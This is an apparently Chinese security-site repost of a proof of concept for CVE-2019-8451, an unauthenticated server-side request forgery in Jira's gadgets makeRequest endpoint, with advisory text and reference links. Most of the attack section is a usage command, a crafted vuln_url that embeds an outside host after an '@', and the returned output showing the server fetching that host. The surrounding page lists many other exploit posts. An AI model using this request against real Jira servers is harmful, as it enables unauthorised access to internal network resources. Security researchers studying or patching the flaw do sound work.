# CVE-2019-8451 Jira未授权SSRF漏洞
## python usage
脚本github获取
`python CVE-2019-8451.py http://www.jas502n.com:8080`
“`
root@kali:~/CVE-2019-8451# python CVE-2019-8451.py http://www.jas502n.com:8080
>>>>SSRF URL: www.baidu.com
>>>>Send poc Success!
X-AUSERNAME= anonymous
>>>>vuln_url= http://www.jas502n.com:8080/plugins/servlet/gadgets/makeRequest?url=http://www.jas502n.com:8080@www.baidu.com
throw 1; < don't be evil' >{“http://www.jas502n.com:8080@www.baidu.com”:{“rc”:200,”headers”:{“set-cookie”:[“BDORZ=27315; max-age=86400; domain=.baidu.com; path=/”]},”body”:”\r\n
百度一下,你就知道<\/title><\/head> <body link=#0000cc> </p>
<div id=wrapper>
<div id=head>
<div class=head_wrapper>
<div class=s_form>
<div class=s_form_wrapper>
<div id=lg> <img hidefocus=true src=//www.baidu.com/img/bd_logo1.png width=270 height=129> <\/div> </p>
<form id=form name=f action=//www.baidu.com/s class=fm> <input type=hidden name=bdorz_come value=1> <input type=hidden name=ie value=utf-8> <input type=hidden name=f value=8> <input type=hidden name=rsv_bp value=1> <input type=hidden name=rsv_idx value=1> <input type=hidden name=tn value=baidu><span class=\"bg s_ipt_wr\"><input id=kw name=wd class=s_ipt value maxlength=255 autocomplete=off autofocus><\/span><span class=\"bg s_btn_wr\"><input type=submit id=su value=百度一下 class=\"bg s_btn\"><\/span> <\/form> <\/div> <\/div> </p>
<div id=u1> <a href=http://news.baidu.com name=tj_trnews class=mnav>新闻<\/a> <a href=http://www.hao123.com name=tj_trhao123 class=mnav>hao123<\/a> <a href=http://map.baidu.com name=tj_trmap class=mnav>地图<\/a> <a href=http://v.baidu.com name=tj_trvideo class=mnav>视频<\/a> <a href=http://tieba.baidu.com name=tj_trtieba class=mnav>贴吧<\/a> <noscript> <a href=http://www.baidu.com/bdorz/login.gif?login&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2f%3fbdorz_come%3d1 name=tj_login class=lb>登录<\/a> <\/noscript> <script>document.write('<a href=\"http://www.baidu.com/bdorz/login.gif?login&tpl=mn&u='+ encodeURIComponent(window.location.href+ (window.location.search === \"\" ? \"?\" : \"&\")+ \"bdorz_come=1\")+ '\" name=\"tj_login\" class=\"lb\">登录<\/a>');<\/script> <a href=//www.baidu.com/more/ name=tj_briicon class=bri style=\"display: block;\">更多产品<\/a> <\/div> <\/div> <\/div> </p>
<div id=ftCon>
<div id=ftConw>
<p id=lh> <a href=http://home.baidu.com>关于百度<\/a> <a href=http://ir.baidu.com>About Baidu<\/a> <\/p> </p>
<p id=cp>©2017 Baidu <a href=http://www.baidu.com/duty/>使用百度前必读<\/a> <a href=http://jianyi.baidu.com/ class=cp-feedback>意见反馈<\/a> 京ICP证030173号 <img src=//www.baidu.com/img/gs.gif> <\/p> <\/div> <\/div> <\/div> <\/body> <\/html>\r\n"}}</p>
<p>>>>>SSRF URL:<br />
```</p>
<p></p>
<p>## 0x01 SSRF in the /plugins/servlet/gadgets/makeRequest resource - CVE-2019-8451</p>
<p>```<br />
The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.</p>
<p>Fixed in Version/s: 8.4.0</p>
<p>```</p>
<p></p>
<p>## 参考链接</p>
<p>https://mp.weixin.qq.com/s/_Tsq9p1pQyszJt2VaXd61A</p>
<p>https://jira.atlassian.com/browse/JRASERVER-69793</p>
<p>## 来源</p>
<p>https://github.com/jas502n/CVE-2019-8451</p>
</div>
<div class="em09 muted-3-color"><div><span>©</span> 版权声明</div><div class="posts-copyright">文章版权归作者所有,未经允许请勿转载。</div></div><div class="text-center theme-box muted-3-color box-body separator em09">THE END</div><div class="theme-box article-tags"><a class="but ml6 radius c-blue" title="查看更多分类文章" href="https://vip.bdziyi.com/category/ldxq/"><i class="fa fa-folder-open-o" aria-hidden="true"></i>漏洞库</a><br></div> </div>
<div class="text-center muted-3-color box-body em09">喜欢就支持一下吧</div><div class="text-center post-actions"><a href="javascript:;" data-action="like" class="action action-like" data-pid="4833"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-like"></use></svg><text>点赞</text><count>0</count></a><a href="javascript:;" data-toggle="modal" data-target="#rewards-modal-1" data-remote="https://vip.bdziyi.com/wp-admin/admin-ajax.php?id=1&action=user_rewards_modal" class="rewards action action-rewards"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-money"></use></svg><text>赞赏</text></a><span class="hover-show dropup action action-share">
<svg class="icon" aria-hidden="true"><use xlink:href="#icon-share"></use></svg><text>分享</text><div class="zib-widget hover-show-con share-button dropdown-menu"><div><a rel="nofollow" class="share-btn qzone" target="_blank" title="QQ空间" href="https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=https://vip.bdziyi.com/4833/&title=CVE-2019-8451-棉花糖会员站&pics=//www.baidu.com/img/bd_logo1.png&summary=# CVE-2019-8451 Jira未授权SSRF漏洞 ## python usage 脚本github获取 `python CVE-2019-8451.py http://www.jas502n.com:8080`  ``` root@kali:~/CVE-2019-8451# python CVE-2019-8451.py http://www.jas502n.com:8080 >>>>SSRF URL: www.baidu.com >>>>Send poc Success!..."><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qzone-color"></use></svg></icon><text>QQ空间<text></a><a rel="nofollow" class="share-btn weibo" target="_blank" title="微博" href="https://service.weibo.com/share/share.php?url=https://vip.bdziyi.com/4833/&title=CVE-2019-8451-棉花糖会员站&pic=//www.baidu.com/img/bd_logo1.png&searchPic=false"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-weibo-color"></use></svg></icon><text>微博<text></a><a rel="nofollow" class="share-btn qq" target="_blank" title="QQ好友" href="https://connect.qq.com/widget/shareqq/index.html?url=https://vip.bdziyi.com/4833/&title=CVE-2019-8451-棉花糖会员站&pics=//www.baidu.com/img/bd_logo1.png&desc=# CVE-2019-8451 Jira未授权SSRF漏洞 ## python usage 脚本github获取 `python CVE-2019-8451.py http://www.jas502n.com:8080`  ``` root@kali:~/CVE-2019-8451# python CVE-2019-8451.py http://www.jas502n.com:8080 >>>>SSRF URL: www.baidu.com >>>>Send poc Success!..."><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qq-color"></use></svg></icon><text>QQ好友<text></a><a rel="nofollow" class="share-btn poster" poster-share="4833" title="海报分享" href="javascript:;"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-poster-color"></use></svg></icon><text>海报分享<text></a><a rel="nofollow" class="share-btn copy" data-clipboard-text="https://vip.bdziyi.com/4833/" data-clipboard-tag="链接" title="复制链接" href="javascript:;"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-copy-color"></use></svg></icon><text>复制链接<text></a></div></div></span><a href="javascript:;" class="action action-favorite signin-loader" data-pid="4833"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-favorite"></use></svg><text>收藏</text><count></count></a></div></article><div class="yiyan-box main-bg theme-box text-center box-body radius8 main-shadow"><div data-toggle="tooltip" data-original-title="点击切换一言" class="yiyan"></div></div><div class="user-card zib-widget author">
<div class="card-content mt10 relative">
<div class="user-content">
<div class="user-avatar"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-img avatar-lg"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a></div>
<div class="user-info mt20 mb10">
<div class="user-name flex jc"><name class="flex1 flex ac"><a class="display-name text-ellipsis " href="https://vip.bdziyi.com/author/1/">棉花糖</a><icon data-toggle="tooltip" title="站长" class="user-auth-icon ml3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-auth"></use></svg></icon><img class="lazyload ml3 img-icon medal-icon" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/medal/medal-28.svg" data-toggle="tooltip" title="年度发烧元老" alt="徽章-年度发烧元老-棉花糖会员站"><img class="lazyload img-icon ml3" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://oss.bdziyi.com/vip/2024/09/20240921093141389.png" data-toggle="tooltip" title="LV7" alt="等级-LV7-棉花糖会员站"><a href="javascript:;" class="focus-color ml10 follow flex0 signin-loader" data-pid="1"><count><i class="fa fa-heart-o mr3" aria-hidden="true"></i>关注</count></a></name></div>
<div class="author-tag mt10 mini-scrollbar"><a class="but c-blue-2 tag-forum-post" data-toggle="tooltip" title="共7篇帖子" href="https://vip.bdziyi.com/author/1/?tab=forum"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg>7</a><a class="but c-blue tag-posts" data-toggle="tooltip" title="共1.3W+篇文章" href="https://vip.bdziyi.com/author/1/"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-post"></use></svg>1.3W+</a><a class="but c-green tag-comment" data-toggle="tooltip" title="共960条评论" href="https://vip.bdziyi.com/author/1/?tab=comment"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-comment"></use></svg>960</a><a class="but c-yellow tag-follow" data-toggle="tooltip" title="共353个粉丝" href="https://vip.bdziyi.com/author/1/?tab=follow"><i class="fa fa-heart em09"></i>353</a><span class="badg c-red tag-view" data-toggle="tooltip" title="人气值 171W+"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hot"></use></svg>171W+</span></div>
<div class="user-desc mt10 muted-2-color em09">公众号:棉花糖fans</div>
</div>
</div>
<div class="swiper-container more-posts swiper-scroll"><div class="swiper-wrapper"><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/77/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/11/20241126051508458.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="会员必看手册(1.8.8版本 25.12.12更新)-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">会员必看手册(1.8.8版本 25.12.12更新)</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">会员必看手册(1.8.8版本 25.12.12更新)</div><div class="px12 opacity8 mt6"><item>2025年12月1日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 3.8W+</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/57589/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/biji/202506011606395.png" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="mingdon 明动 burp插件0.2.6版本 本地时间校验去除版-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">mingdon 明动 burp插件0.2.6版本 本地时间校验去除版</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">mingdon 明动 burp插件0.2.6版本 本地时间校验去除版</div><div class="px12 opacity8 mt6"><item>2025年7月3日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 1.5W+</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/53919/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2025/03/20250310133450331.png" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="独家!超强代码审计工具上线!免费会员等你来嫖!-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">独家!超强代码审计工具上线!免费会员等你来嫖!</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">独家!超强代码审计工具上线!免费会员等你来嫖!</div><div class="px12 opacity8 mt6"><item>2024年12月17日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 8567</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58468/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/04/20240401083217388.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="2025 hw 有poc的漏洞集合-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">2025 hw 有poc的漏洞集合</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">2025 hw 有poc的漏洞集合</div><div class="px12 opacity8 mt6"><item>2025年7月31日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 6313</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/129/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240626133442218.png" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="技术文章投稿兑换会员规则-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">技术文章投稿兑换会员规则</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">技术文章投稿兑换会员规则</div><div class="px12 opacity8 mt6"><item>2024年3月25日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 4558</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/10860/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/04/20240401084118281.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="王老师src真正的完整版(49个学生分享视频版本)-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">王老师src真正的完整版(49个学生分享视频版本)</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">王老师src真正的完整版(49个学生分享视频版本)</div><div class="px12 opacity8 mt6"><item>2024年6月8日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 3741</item></div></div></div></a></div></div><div class="swiper-button-prev"></div><div class="swiper-button-next"></div></div>
</div>
</div> <div class="theme-box" style="height:99px">
<nav class="article-nav">
<div class="main-bg box-body radius8 main-shadow">
<a href="https://vip.bdziyi.com/4667/">
<p class="muted-2-color"><i class="fa fa-angle-left em12"></i><i
class="fa fa-angle-left em12 mr6"></i>上一篇</p>
<div class="text-ellipsis-2">
YzmCMS 3.6存在XSS漏洞 </div>
</a>
</div>
<div class="main-bg box-body radius8 main-shadow">
<a href="https://vip.bdziyi.com/4925/">
<p class="muted-2-color">下一篇<i class="fa fa-angle-right em12 ml6"></i><i
class="fa fa-angle-right em12"></i></p>
<div class="text-ellipsis-2">
[.Net版]-Ueditor编辑器文件上传 </div>
</a>
</div>
</nav>
</div>
<div class="theme-box relates relates-thumb">
<div class="box-body notop">
<div class="title-theme">相关推荐</div>
</div><div class="zib-widget"><div class="swiper-container swiper-scroll"><div class="swiper-wrapper"><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58468/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/04/20240401083217388.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="2025 hw 有poc的漏洞集合-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">2025 hw 有poc的漏洞集合</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">2025 hw 有poc的漏洞集合</div><div class="px12 opacity8 mt6"><item>2025年7月31日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 6313</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58091/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="金蝶EAS autoLogin.jsp远程代码执行-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">金蝶EAS autoLogin.jsp远程代码执行</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">金蝶EAS autoLogin.jsp远程代码执行</div><div class="px12 opacity8 mt6"><item>2025年7月4日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 2429</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58988/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="百度网盘Windows客户端存在远程命令执行-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">百度网盘Windows客户端存在远程命令执行</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">百度网盘Windows客户端存在远程命令执行</div><div class="px12 opacity8 mt6"><item>2025年9月4日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 2299</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58241/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="大华 evo-runs/v1.0/receive RCE-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">大华 evo-runs/v1.0/receive RCE</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">大华 evo-runs/v1.0/receive RCE</div><div class="px12 opacity8 mt6"><item>2025年7月11日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 1985</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58301/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="wps 远程代码执行 rce-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">wps 远程代码执行 rce</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">wps 远程代码执行 rce</div><div class="px12 opacity8 mt6"><item>2025年7月18日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 1825</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58089/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="爱数AnyShare智能内容管理平台 start_service
存在远程命令执行-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">爱数AnyShare智能内容管理平台 start_service
存在远程命令执行</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">爱数AnyShare智能内容管理平台 start_service
存在远程命令执行</div><div class="px12 opacity8 mt6"><item>2025年7月4日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 1705</item></div></div></div></a></div></div><div class="swiper-button-prev"></div><div class="swiper-button-next"></div></div></div></div><div class="theme-box" id="comments">
<div class="box-body notop">
<div class="title-theme">评论 <small>抢沙发</small></div>
</div>
<div class="no_webshot main-bg theme-box box-body radius8 main-shadow">
<div class="comment-signarea text-center box-body radius8">
<h3 class="text-muted em12 theme-box muted-3-color">请登录后发表评论</h3>
<p>
<a href="javascript:;" class="signin-loader but c-blue padding-lg"><i class="fa fa-fw fa-sign-in mr10" aria-hidden="true"></i>登录</a>
<a href="javascript:;" class="signup-loader ml10 but c-yellow padding-lg"><svg class="icon mr10" aria-hidden="true"><use xlink:href="#icon-signup"></use></svg>注册</a> </p>
<p class="social-separator separator muted-3-color em09">社交账号登录</p><div class="social_loginbar"><a rel="nofollow" title="微信登录" href="https://vip.bdziyi.com/oauth/weixingzh?rurl=https%3A%2F%2Fvip.bdziyi.com%2F4833%2F" class="social-login-item weixingzh toggle-radius qrcode-signin"><i class="fa fa-weixin" aria-hidden="true"></i></a></div> </div>
<div id="postcomments">
<ol class="commentlist list-unstyled">
<div class="text-center comment-null" style="padding:30px 0;"><img style="width:280px;opacity: .7;" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/null-user.svg"><p style="margin-top:30px;" class="em09 muted-3-color separator">请登录后查看评论内容</p></div> </ol>
</div>
</div>
</div> </div>
</div>
<div class="sidebar">
<div class="mb20"><div class="box-body notop"><div class="title-theme">作者</div></div><div class="user-card zib-widget widget"><div class="user-cover graphic" style="padding-bottom: 50%;"><img class="lazyload fit-cover user-cover user-cover-id-1" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-lg.svg" data-src="https://oss.bdziyi.com/vip/2024/11/20241126045446604.png" alt="用户封面"></div>
<div class="card-content mt10 relative">
<div class="user-content">
<div class="user-avatar"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-img avatar-lg"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a></div>
<div class="user-info mt20 mb10">
<div class="user-name flex jc"><name class="flex1 flex ac"><a class="display-name text-ellipsis " href="https://vip.bdziyi.com/author/1/">棉花糖</a><icon data-toggle="tooltip" title="站长" class="user-auth-icon ml3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-auth"></use></svg></icon><img class="lazyload ml3 img-icon medal-icon" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/medal/medal-28.svg" data-toggle="tooltip" title="年度发烧元老" alt="徽章-年度发烧元老-棉花糖会员站"><img class="lazyload img-icon ml3" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://oss.bdziyi.com/vip/2024/09/20240921093141389.png" data-toggle="tooltip" title="LV7" alt="等级-LV7-棉花糖会员站"><a href="javascript:;" class="focus-color ml10 follow flex0 signin-loader" data-pid="1"><count><i class="fa fa-heart-o mr3" aria-hidden="true"></i>关注</count></a></name></div>
<div class="author-tag mt10 mini-scrollbar"><a class="but c-blue-2 tag-forum-post" data-toggle="tooltip" title="共7篇帖子" href="https://vip.bdziyi.com/author/1/?tab=forum"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg>7</a><a class="but c-blue tag-posts" data-toggle="tooltip" title="共1.3W+篇文章" href="https://vip.bdziyi.com/author/1/"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-post"></use></svg>1.3W+</a><a class="but c-green tag-comment" data-toggle="tooltip" title="共960条评论" href="https://vip.bdziyi.com/author/1/?tab=comment"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-comment"></use></svg>960</a><a class="but c-yellow tag-follow" data-toggle="tooltip" title="共353个粉丝" href="https://vip.bdziyi.com/author/1/?tab=follow"><i class="fa fa-heart em09"></i>353</a><span class="badg c-red tag-view" data-toggle="tooltip" title="人气值 171W+"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hot"></use></svg>171W+</span></div>
<div class="user-desc mt10 muted-2-color em09">公众号:棉花糖fans</div>
</div>
</div>
<div class="more-posts-mini"><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60892/">东胜物流软件 GetAuthorityRange 存在SQL注入</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60891/">用友-时空KSOA chatconfirm 存在SQL注入</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60890/">污染源在线监控系统DownLoad.aspx 存在SQL注入</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60889/">污染源在线监控系统AES_B_DDL.ashx 存在SQL注入</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60880/">Elber 身份认证绕过漏洞(CVE-2025-0674)</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/60874/">offsec WEB-300 课程:高级 Web 攻击和利用</a></div></div>
</div>
</div></div><div></div><div data-affix="true" class="posts-nav-box" data-title="文章目录"></div><div class="theme-box"><div class="box-body notop"><div class="title-theme">最近一周热门文章</div></div><div class="box-body posts-mini-lists zib-widget"><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-red">1</span><a href="https://vip.bdziyi.com/60846/">致远OA checkComponentFile后台反序列化任意命令执行<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月17日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow" data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>869</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-yellow">2</span><a href="https://vip.bdziyi.com/60818/">西安九佳易信息资讯有限公司时尚企业管理系统UpdatePrivilegedState code参数存在SQL注入<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月15日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow" data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>702</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-purple">3</span><a href="https://vip.bdziyi.com/60876/">金和OA AjaxForDepartmentCollect.ashx SQL注入<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a><span class="ml6">2025年12月20日</span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow" data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>648</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-blue">4</span><a href="https://vip.bdziyi.com/60858/">安友固定资产管理系统 DoUpload 存在任意文件上传<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item 